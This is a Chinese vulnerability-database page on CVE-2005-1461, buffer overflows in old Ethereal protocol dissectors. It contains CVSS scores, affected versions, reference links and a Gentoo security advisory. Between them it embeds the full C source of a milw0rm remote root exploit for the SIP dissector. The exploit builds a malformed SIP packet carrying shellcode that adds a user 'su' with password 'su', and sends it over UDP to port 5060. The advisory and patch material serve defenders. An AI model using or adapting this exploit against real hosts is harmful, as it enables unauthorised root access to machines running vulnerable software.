CVE-2005-1461
CVSS7.5
发布时间 :2005-05-05 00:00:00
修订时间 :2010-08-21 00:28:54
NMCOEP    

[原文]Multiple buffer overflows in the (1) SIP, (2) CMIP, (3) CMP, (4) CMS, (5) CRMF, (6) ESS, (7) OCSP, (8) X.509, (9) ISIS, (10) DISTCC, (11) FCELS, (12) Q.931, (13) NCP, (14) TCAP, (15) ISUP, (16) MEGACO, (17) PKIX1Explitit, (18) PKIX_Qualified, (19) Presentation dissectors in Ethereal before 0.10.11 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code.


[CNNVD]Ethereal多个协议分析处理模块漏洞(CNNVD-200505-929)

        Ethereal是一款非常流行的网络协议分析工具。
        Ethereal厂商报告了各种协议处理模块中的多个漏洞,包括:
         - 缓冲区溢出漏洞
         - 格式串漏洞
         - 空指针引用拒绝服务漏洞
         - 分段错误拒绝服务漏洞
         - 死循环漏洞
         - 内存耗尽拒绝服务漏洞
         - 双重释放漏洞
         - 未明的拒绝服务漏洞
        这些漏洞可能允许远程攻击者执行任意代码或导致受影响的应用程序崩溃。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:ethereal_group:ethereal:0.10.8
cpe:/a:ethereal_group:ethereal:0.9.8
cpe:/a:ethereal_group:ethereal:0.10.9
cpe:/a:ethereal_group:ethereal:0.9
cpe:/a:ethereal_group:ethereal:0.9.11
cpe:/a:ethereal_group:ethereal:0.9.16
cpe:/a:ethereal_group:ethereal:0.9.2
cpe:/a:ethereal_group:ethereal:0.9.4
cpe:/a:ethereal_group:ethereal:0.9.5
cpe:/a:ethereal_group:ethereal:0.10.10
cpe:/a:ethereal_group:ethereal:0.8.14
cpe:/a:ethereal_group:ethereal:0.10.1
cpe:/a:ethereal_group:ethereal:0.10.7
cpe:/a:ethereal_group:ethereal:0.10.2
cpe:/a:ethereal_group:ethereal:0.9.12
cpe:/a:ethereal_group:ethereal:0.8
cpe:/a:ethereal_group:ethereal:0.9.15
cpe:/a:ethereal_group:ethereal:0.9.3
cpe:/a:ethereal_group:ethereal:0.10.0
cpe:/a:ethereal_group:ethereal:0.10.4
cpe:/a:ethereal_group:ethereal:0.8.15
cpe:/a:ethereal_group:ethereal:0.10.5
cpe:/a:ethereal_group:ethereal:0.10.3
cpe:/a:ethereal_group:ethereal:0.9.7
cpe:/a:ethereal_group:ethereal:0.9.9
cpe:/a:ethereal_group:ethereal:0.9.14
cpe:/a:ethereal_group:ethereal:0.9.10
cpe:/a:ethereal_group:ethereal:0.10.6
cpe:/a:ethereal_group:ethereal:0.9.13
cpe:/a:ethereal_group:ethereal:0.8.18
cpe:/a:ethereal_group:ethereal:0.8.13
cpe:/a:ethereal_group:ethereal:0.9.1
cpe:/a:ethereal_group:ethereal:0.8.19
cpe:/a:ethereal_group:ethereal:0.9.6
cpe:/a:ethereal_group:ethereal:0.10

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:9853Multiple buffer overflows in the (1) SIP, (2) CMIP, (3) CMP, (4) CMS, (5) CRMF, (6) ESS, (7) OCSP, (8) X.509, (9) ISIS, (10) DISTCC, (11) FC...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1461
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1461
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-929
(官方数据源) CNNVD

- 其它链接及资源

http://www.ethereal.com/news/item_20050504_01.html
(UNKNOWN)  CONFIRM  http://www.ethereal.com/news/item_20050504_01.html
http://www.ethereal.com/appnotes/enpa-sa-00019.html
(UNKNOWN)  CONFIRM  http://www.ethereal.com/appnotes/enpa-sa-00019.html
http://www.securityfocus.com/bid/13504
(UNKNOWN)  BID  13504
http://www.redhat.com/support/errata/RHSA-2005-427.html
(UNKNOWN)  REDHAT  RHSA-2005:427
http://www.redhat.com/archives/fedora-legacy-announce/2006-January/msg00003.html
(UNKNOWN)  FEDORA  FLSA-2006:152922
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000963
(UNKNOWN)  CONECTIVA  CLSA-2005:963

- 漏洞信息

Ethereal多个协议分析处理模块漏洞
高危 缓冲区溢出
2005-05-05 00:00:00 2005-10-20 00:00:00
远程  
        Ethereal是一款非常流行的网络协议分析工具。
        Ethereal厂商报告了各种协议处理模块中的多个漏洞,包括:
         - 缓冲区溢出漏洞
         - 格式串漏洞
         - 空指针引用拒绝服务漏洞
         - 分段错误拒绝服务漏洞
         - 死循环漏洞
         - 内存耗尽拒绝服务漏洞
         - 双重释放漏洞
         - 未明的拒绝服务漏洞
        这些漏洞可能允许远程攻击者执行任意代码或导致受影响的应用程序崩溃。
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载0.10.11:
        http://www.ethereal.com/distribution/ethereal-0.10.11.tar.gz
        http://security.gentoo.org/glsa/glsa-200505-03.xml

- 漏洞信息 (1021)

Ethereal <= 0.10.10 (SIP) Protocol Dissector Remote BoF Exploit (EDBID:1021)
linux remote
2005-05-31 Verified
0 Team W00dp3ck3r
N/A [点击下载]
/* tethereal_sip.c (now quite functional)
*
* Ethereal (0.10.0 to 0.10.10) SIP Dissector remote root exploit
*
* Advisory: 
* http://www.ethereal.com/appnotes/enpa-sa-00019.html
* 
* produced by Team W00dp3ck3r:
* frauk\x41iser
* mag00n
* s00n
* thorben
* 
* Notes:
* tested on Debian Sarge 
* Linux maggot4 2.6.8-1-386 #1 Mon Sep 13 23:29:55 EDT 2004 i686 GNU/Linux
*
* tested version of ethereal:
* http://www.ethereal.com/distribution/all-versions/ethereal-0.10.10.tar.gz
* (./configure, make, make install ;))
* 
* victim has to switch from normal user to root using "su -" 
* the exploit adds a user named "su" with password "su" on the victim host
* 
*/


#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>


unsigned char sip_header[] = 
"\x4f\x50\x54\x49\x4f\x4e\x53\x20\x73\x69\x70\x3a\x68\x61\x63"
"\x6b\x20\x53\x49\x50\x2f\x32\x2e\x30\x0a\x56\x69\x61\x3a\x20"
"\x53\x49\x50\x2f\x32\x2e\x30\x2f\x55\x44\x50\x20\x63\x70\x63"
"\x31\x2d\x6d\x61\x72\x73\x31\x2d\x33\x2d\x30\x2d\x63\x75\x73"
"\x74\x32\x32\x35\x2e\x6d\x69\x64\x64\x2e\x63\x61\x62\x6c\x65"
"\x2e\x6e\x74\x6c\x2e\x63\x6f\x6d\x3a\x35\x35\x31\x31\x38\x3b"
"\x72\x70\x6f\x72\x74\x0d\x0a\x56\x69\x61\x3a\x20\x53\x49\x50"
"\x2f\x32\x2e\x30\x2f\x55\x44\x50\x20\x68\x61\x63\x6b\x3a\x39"
"\x0a\x46\x72\x6f\x6d\x3a\x20\x73\x69\x70\x3a\x68\x61\x63\x6b"
"\x3b\x74\x61\x67\x3d\x36\x31\x35\x61\x65\x37\x37\x30\x0a\x54"
"\x6f\x3a\x20\x73\x69\x70\x3a\x68\x61\x63\x6b";

unsigned char callid[] =
"\x0a\x43\x61\x6c\x6c\x2d\x49\x44\x3a\x20";


/* adduser shellcode, user: "su", pwd: "su" Full Size=116, splitted into 
2 parts because one buffer was too small. thx to http://metasploit.com */
unsigned char shellcode[] =
"\x31\xc9\x83\xe9\xe9\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa5"
"\xb7\x95\xbb\x83\xeb\xfc\xe2\xf4\x94\x7e\x1c\x70\xcf\xf1\xcd\x76"
"\x25\xdd\x90\xe3\x94\x7e\xc4\xd3\xd6\xc4\xe2\xdf\xcd\x98\xba\xcb"
"\xc4\xdf\xba\xde\xd1\xd4\x1c\x58\xe4\x02\x91\x76\x25\x24\x7d\x9b"
"\xa5\xb7\x95\xc8\xd0\x8d\xd4\xfa\xdf\xf2\xac\xd4\xd4\xf9\xdd\xed"
"\xf5\x82\xe6\x81\x95\x8d\xa5\x81\x9f\x98\xaf\x94\xc7\xde\xfb\x94"
"\xd6\xdf\x9f\xe2\x2e\xe6";


unsigned char cseq[] = 
"\x0a\x43\x53\x65\x71\x3a\x20";

/* the malformed cseq method field. the buffer has a size of 16 byte. you need 
48 byte to overwrite the return address. the first byte is checked isalpha(), 
so we splitted the shellcode in a way that the first char of cseq_method passes
the isalpha() check. */ 
unsigned char cseq_method[] = 
"\x69\xd1\xa1\xef\x58\x3b\xcf\xb6\xcd\x76\x25\xb7\x95\xbb";


/* needed to be a fully valid sip packet */
unsigned char sip_footer[] =
"\x0a\x43\x6f\x6e\x74\x61\x63\x74\x3a\x20\x68\x61\x63\x6b\x3a"
"\x39\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74"
"\x68\x3a\x20\x30\x0a\x4d\x61\x78\x2d\x46\x6f\x72\x77\x61\x72"
"\x64\x73\x3a\x20\x37\x30\x0a\x55\x73\x65\x72\x2d\x41\x67\x65"
"\x6e\x74\x3a\x20\x57\x30\x30\x64\x70\x33\x63\x6b\x33\x72\x20"
"\x0a";



int main(int argc, char * argv[]) {
unsigned int i, offset, ret, p_addr;
struct sockaddr_in dest;
struct hostent *he;
int sock, slen = sizeof(struct sockaddr);
unsigned char buffer[2048];

// help output
if(argc < 3) {
printf("correct syntax: %s <flag> <host> \n", argv[0]);
printf("possible flag: \n");
printf("1 the ethereal user has started tethereal" 
"with full path as root \n");
printf("2 the ethereal user has started tethereal" 
"without directorypath as root \n");
return 1;
}

// p_addr may differ on other systems ;)
if (argv[1][0] == '1') {
p_addr = 0xbffee328;
}

if (argv[1][0] == '2') {
p_addr = 0xbffee338;
}

// destination-ip check
if((he = gethostbyname(argv[2])) == NULL) {
printf("[!] Couldn't resolve %s\n", argv[2]);
return 1;
}

// open socket
if((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) {
perror("socket()");
return 1;
}

// set packet parameters
dest.sin_port = htons(5060);
dest.sin_family = AF_INET;
dest.sin_addr = *((struct in_addr *)he->h_addr);

// set the returnaddress (may differ on other systems)
ret = 0xbffee240; 


//// generate a buffer containing the data ////
offset = 0;

// set all values of the buffer to 0x0
memset(buffer, 0x0, sizeof(buffer));

// copy the header into the buffer
memcpy(buffer+offset, sip_header, sizeof(sip_header)); 
offset += sizeof(sip_header) -1;

// concat the callid into the buffer
memcpy(buffer+offset, callid, sizeof(callid)); 
offset += sizeof(callid) -1;

// add the callid-value (nop+shellcode)
i = 128 - sizeof(shellcode) +1; 
memset(buffer+offset, 0x90, i);
offset += i;

// insert shellcode into buffer
memcpy(buffer+offset, shellcode, sizeof(shellcode));
offset += sizeof(shellcode) -1; 


// concat the cseq
memcpy(buffer+offset, cseq, sizeof(cseq)); 
offset += sizeof(cseq) -1;

// generate the part, which causes the overflow (=cseq-method)
memcpy(buffer+offset, cseq_method, sizeof(cseq_method)); 
offset += sizeof(cseq_method) -1; 

// fill the rest of cseq_method with A
memset(buffer+offset, 0x41, 30);
offset += 30; 
// write return address
*(long *)&buffer[offset] = ret; 
offset += 4;

// repair the first pointer after ret- address
*(long *)&buffer[offset] = 0x08215184; // is a pointer DEST-value: 0x1
offset += 4;
// repair second pointer after ret- address 
*(long *)&buffer[offset] = p_addr;
offset += 4; 

// the finalising part of the message
memcpy(buffer+offset, sip_footer, sizeof(sip_footer)); 

// send the buffer to the victim
if (sendto(sock, buffer, sizeof(buffer), 0, 
(struct sockaddr *)&dest, slen)== -1) {
printf("[!] Error sending packet!\n");
return 1;
}

// DEBUG //
// printf("%s\n", buffer);

printf("[*] dark W00dp3ck3r packet sent!\n");
close(sock);
return 0;

}

// milw0rm.com [2005-05-31]
		

- 漏洞信息 (F38410)

Gentoo Linux Security Advisory 200505-3 (PacketStormID:F38410)
2005-07-02 00:00:00
Gentoo  security.gentoo.org
advisory,arbitrary,vulnerability
linux,gentoo
CVE-2005-1456,CVE-2005-1457,CVE-2005-1458,CVE-2005-1459,CVE-2005-1460,CVE-2005-1461,CVE-2005-1462,CVE-2005-1463,CVE-2005-1464,CVE-2005-1465,CVE-2005-1466,CVE-2005-1467,CVE-2005-1468,CVE-2005-1469,CVE-2005-1470
[点击下载]

Gentoo Linux Security Advisory GLSA 200505-03 - Ethereal is vulnerable to numerous vulnerabilities potentially resulting in the execution of arbitrary code or abnormal termination. Versions less than 0.10.11 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200505-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Ethereal: Numerous vulnerabilities
      Date: May 06, 2005
      Bugs: #90539
        ID: 200505-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Ethereal is vulnerable to numerous vulnerabilities potentially
resulting in the execution of arbitrary code or abnormal termination.

Background
==========

Ethereal is a feature rich network protocol analyzer.

Affected packages
=================

    -------------------------------------------------------------------
     Package                /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  net-analyzer/ethereal      < 0.10.11                   >= 0.10.11

Description
===========

There are numerous vulnerabilities in versions of Ethereal prior to
0.10.11, including:

* The ANSI A and DHCP dissectors are vulnerable to format string
  vulnerabilities.

* The DISTCC, FCELS, SIP, ISIS, CMIP, CMP, CMS, CRMF, ESS, OCSP,
  PKIX1Explitit, PKIX Qualified, X.509, Q.931, MEGACO, NCP, ISUP, TCAP
  and Presentation dissectors are vulnerable to buffer overflows.

* The KINK, WSP, SMB Mailslot, H.245, MGCP, Q.931, RPC, GSM and SMB
  NETLOGON dissectors are vulnerable to pointer handling errors.

* The LMP, KINK, MGCP, RSVP, SRVLOC, EIGRP, MEGACO, DLSw, NCP and
  L2TP dissectors are vulnerable to looping problems.

* The Telnet and DHCP dissectors could abort.

* The TZSP, Bittorrent, SMB, MGCP and ISUP dissectors could cause a
  segmentation fault.

* The WSP, 802.3 Slow protocols, BER, SMB Mailslot, SMB, NDPS, IAX2,
  RADIUS, SMB PIPE, MRDISC and TCAP dissectors could throw assertions.

* The DICOM, NDPS and ICEP dissectors are vulnerable to memory
  handling errors.

* The GSM MAP, AIM, Fibre Channel,SRVLOC, NDPS, LDAP and NTLMSSP
  dissectors could terminate abnormallly.

Impact
======

An attacker might be able to use these vulnerabilities to crash
Ethereal and execute arbitrary code with the permissions of the user
running Ethereal, which could be the root user.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Ethereal users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-analyzer/ethereal-0.10.11"

References
==========

  [ 1 ] Ethereal enpa-sa-00019
        http://www.ethereal.com/appnotes/enpa-sa-00019.html
  [ 2 ] CAN-2005-1456
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1456
  [ 3 ] CAN-2005-1457
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1457
  [ 4 ] CAN-2005-1458
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1458
  [ 5 ] CAN-2005-1459
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1459
  [ 6 ] CAN-2005-1460
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1460
  [ 7 ] CAN-2005-1461
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1461
  [ 8 ] CAN-2005-1462
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1462
  [ 9 ] CAN-2005-1463
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1463
  [ 10 ] CAN-2005-1464
         http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1464
  [ 11 ] CAN-2005-1465
         http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1465
  [ 12 ] CAN-2005-1466
         http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1466
  [ 13 ] CAN-2005-1467
         http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1467
  [ 14 ] CAN-2005-1468
         http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1468
  [ 15 ] CAN-2005-1469
         http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1469
  [ 16 ] CAN-2005-1470
         http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1470

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200505-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0
    

- 漏洞信息

16097
Ethereal DISTCC Dissector Multiple Message Type Parsing Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

A remote overflow exists in Ethereal. The DISTCC dissector fails to validate argv, serr and sout messages resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2005-05-04 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 0.10.11 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站